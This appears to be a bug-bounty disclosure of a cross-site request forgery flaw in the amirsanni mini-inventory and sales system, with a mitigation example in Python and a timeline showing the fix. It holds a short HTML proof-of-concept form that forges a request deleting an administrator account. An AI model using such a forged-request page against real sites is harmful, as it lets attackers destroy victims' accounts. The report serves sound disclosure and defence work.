Cross-Site Request Forgery (CSRF) in amirsanni/mini-inventory-and-sales-management-system


Reported on

Sep 7th 2021

✍️ Description

An attacker can delete administrator accounts if a logged-in user visits an attacker-controlled website.

🕵️‍♂️ Proof of Concept

1. While logged in, open this POC.html in a browser (Firefox and Safari): you will see that you unintentionally delete an administrator account.

 <!-- Changes the URL shown in the address bar to / without navigating (part of the reported PoC) -->
 <script>history.pushState('', '', '/')</script>
 <!-- action is left empty in the report; the vulnerable delete endpoint is not given on this page -->
 <form action="" method="POST">
   <!-- _aId: id of the administrator account the forged request deletes (396 in the report) -->
   <input type="hidden" name="_aId" value="396" />
   <input type="submit" value="Submit request" />
 </form>

💥 Impact

This vulnerability allows an attacker to trick an administrator into unintentionally deleting an account.

💥 Test

Tested on Firefox and Safari.

💥 Fix

You should require a CSRF token on these requests.
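An added example of that mitigation, not code from the project (whose own code base is not shown on this page): a Python simulation of a synchronizer-token check in front of the delete handler. The session dict, the csrf_token field name and the handler function are assumptions; _aId is the parameter from the report.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Assumed per-session store: a plain dict stands in for the app's session.
def issue_csrf_token(session: Dict[str, str]) -> str:
    """Generate a random per-session token and remember it server-side."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token

def render_delete_form(session: Dict[str, str], admin_id: str) -> str:
    """Legitimate delete form: the hidden token is what a cross-site page cannot read."""
    token = session.get("csrf_token") or issue_csrf_token(session)
    return (
        '<form method="POST">'
        f'<input type="hidden" name="csrf_token" value="{token}" />'
        f'<input type="hidden" name="_aId" value="{admin_id}" />'
        '<input type="submit" value="Delete" /></form>'
    )

def is_valid_csrf(session: Dict[str, str], submitted: Optional[str]) -> bool:
    """Constant-time comparison; a missing token on either side fails closed."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())

def handle_delete_admin(session: Dict[str, str], form: Dict[str, str],
                        accounts: Dict[str, str]) -> Tuple[int, str]:
    """Hypothetical POST handler for the request the report forges (_aId = account id)."""
    if not is_valid_csrf(session, form.get("csrf_token")):
        return 403, "CSRF token missing or invalid"  # a forged cross-site POST stops here
    admin_id = form.get("_aId", "")
    if admin_id not in accounts:
        return 404, "no such account"
    del accounts[admin_id]
    return 200, f"account {admin_id} deleted"
```

Pairing the token with a SameSite=Lax session cookie adds defence in depth, but the token check is what makes the handler refuse the forged POST from the PoC above.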


We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 2 years ago


Hi, have you checked this report?

Amir validated this vulnerability a year ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir marked this as fixed with commit ba36f6 a year ago
Amir has been awarded the fix bounty
This vulnerability will not receive a CVE